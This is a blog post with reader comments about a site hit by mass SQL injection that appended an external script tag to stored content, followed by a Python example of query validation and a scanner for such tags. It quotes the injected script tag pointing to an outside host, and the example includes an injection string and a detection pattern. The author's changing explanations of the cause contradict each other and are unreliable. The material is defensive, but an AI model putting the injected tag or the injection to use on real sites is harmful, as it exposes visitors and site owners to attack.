Updated from: The xiaobaishan bomb.
Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one. We were hacked again; this is the script it's calling:
<script src=http://flyzhu.9966.org/us/Help.asp></script>
Tricky little fucker.
In fact, this hack is pretty well thought out. Like I said on a previous post, this was a sql injection, but our application is made to block sql injection of all kinds. What happened?
This is a Windows vulnerability. What the hacker did was attempt to run around the code and gain access to the asp.net Windows Media Player library via our /images/ folder. They found an image they liked, they ran some kind of script, and gained access to run a sql insertion script that the application itself did not allow.
UPDATE: I’ve got new info on this. It’s a pure sql injection hack.
Sneaky fucker.
Apparently, this is a vulnerability that Microsoft put out a patch for, and our hosting provider didn’t run it against our VPS yet.
UPDATE: Yes they did. Whoopsee.
So to protect your server against this hack, have your hosting provider run the latest updates for the vulnerability.
Right now, there are a reported 10,000 sites affected by this hack.
You know which patch?
Does anyone know how to fix this? I have installed everything from Windows Update but it didn't help. Update was done obviously too late 🙁
Would you happen to have more details on the patch from Microsoft? I can’t seem to find it. Thanks.
Can you post a link to this patch? One of our sites was affected by this and I did a search but can't seem to find the patch. We have automatic updates turned on but still got hacked. Thanks!
@Mark – They are part of the regular Windows Updates your server should be running.
@GFN – If you're talking about your database, you're too late, you're going to have to recover the data and do some serious patching.
@Russ – See Mark
@Krystal – See Mark
I did find some useful stuff. I’ll post a link up with the update.
I have a dedicated server which is up to date, so it didn’t make sense that I would be missing a patch. I found a blog from Microsoft stating that there was no problem which required patching.
Upon further inspection, I found a page on my site that was susceptible to sql injection through the query string. After writing simple validation, I have been problem-free for 24 hours. You can also try to look into SQL Triggers to help with this issue:
http://www.sqlteam.com/article/an-introduction-to-triggers-part-i
so there is no patch … figured that …
@Mark – Well, yes and no. There is a patch for the Windows Media File problem, that’s part of regular updates. But if these types of vulnerabilities “might” be part of the problem, I for one want every update available.
He got to me through some old asp code. A login that had no validation. Could have been a lot worse, I lost a little data but for the most part he just appended my data.
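The fix described in the comments above (validating a query-string value before it reaches the database), together with a scan for script tags appended to stored text, as an added example that is not code from the post or its commenters. It is written in Python with an in-memory SQLite table standing in for the site's ASP and SQL Server stack; the table, the function names and the bad.example URL are constructed for illustration.

```python
import re
import sqlite3

# Matches a <script> tag whose src is an external http(s) URL,
# the same shape as the tag quoted in the post.
SCRIPT_TAG = re.compile(r"<script\s+src=[\"']?https?://[^>]*>\s*</script>", re.I)

def make_db():
    # Constructed sample data; row 2 carries an appended tag.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO articles VALUES (?, ?)",
        [(1, "Welcome"),
         (2, "Contact us<script src=http://bad.example/x.js></script>")],
    )
    return db

def lookup_unsafe(db, raw_id):
    # The flaw: the query-string value becomes part of the SQL text.
    return db.execute("SELECT title FROM articles WHERE id = " + raw_id).fetchall()

def lookup_safe(db, raw_id):
    # Simple validation: an id is 1 to 9 ASCII digits and nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("rejected id: %r" % raw_id)
    # Binding keeps the value out of the SQL text even if validation changes later.
    return db.execute("SELECT title FROM articles WHERE id = ?", (int(raw_id),)).fetchall()

def find_tainted(db):
    # Ids of rows where an external script tag sits in the stored text.
    rows = db.execute("SELECT id, title FROM articles").fetchall()
    return [row_id for row_id, title in rows if SCRIPT_TAG.search(title)]

def clean_tainted(db):
    # Strip the tag in place and return the ids that were changed.
    rows = db.execute("SELECT id, title FROM articles").fetchall()
    changed = [(SCRIPT_TAG.sub("", t), i) for i, t in rows if SCRIPT_TAG.search(t)]
    db.executemany("UPDATE articles SET title = ? WHERE id = ?", changed)
    return [row_id for _, row_id in changed]

if __name__ == "__main__":
    db = make_db()
    print("unsafe lookup rows:", len(lookup_unsafe(db, "1 OR 1=1")))
    print("tainted ids:", find_tainted(db))
    print("cleaned ids:", clean_tainted(db), "remaining:", find_tainted(db))
```

On a real site the scan has to cover every text column, and stripping the tags only cleans up the symptom; the unvalidated page still needs the fix shown in `lookup_safe`.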